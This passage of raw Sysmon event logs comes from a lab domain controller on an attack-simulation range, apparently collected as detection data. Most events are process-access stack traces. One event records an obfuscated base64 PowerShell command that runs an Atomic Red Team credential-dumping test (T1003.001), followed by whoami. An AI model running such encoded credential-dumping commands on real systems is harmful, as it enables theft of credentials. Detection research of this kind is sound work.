indows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004965Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004964Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004963Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004962Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004961Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004960Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CD9-5FA1-FF00-000000008801}2580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004959Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.885{D28789B6-7CD7-5FA1-EA00-000000008801}38161744C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{D28789B6-7CD9-5FA1-FF00-000000008801}2580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17249|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+137ff|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004958Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.886{D28789B6-7CD9-5FA1-FF00-000000008801}2580C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD7-5FA1-EA00-000000008801}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2676 10341000x80000000000000004957Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.870{D28789B6-7CD7-5FA1-EA00-000000008801}38161744C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+457e6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+460cb|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+453d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d925|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004956Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD9-5FA1-FE00-000000008801}4456C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004955Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004954Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004953Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004952Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004951Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004950Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004949Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004948Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004947Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004946Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CD9-5FA1-FE00-000000008801}4456C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004945Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD9-5FA1-FE00-000000008801}4456C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319332ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd43f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64) 154100x80000000000000004944Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.753{D28789B6-7CD9-5FA1-FE00-000000008801}4456C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 10341000x80000000000000004943Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.745{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD9-5FA1-FD00-000000008801}1352C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004942Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 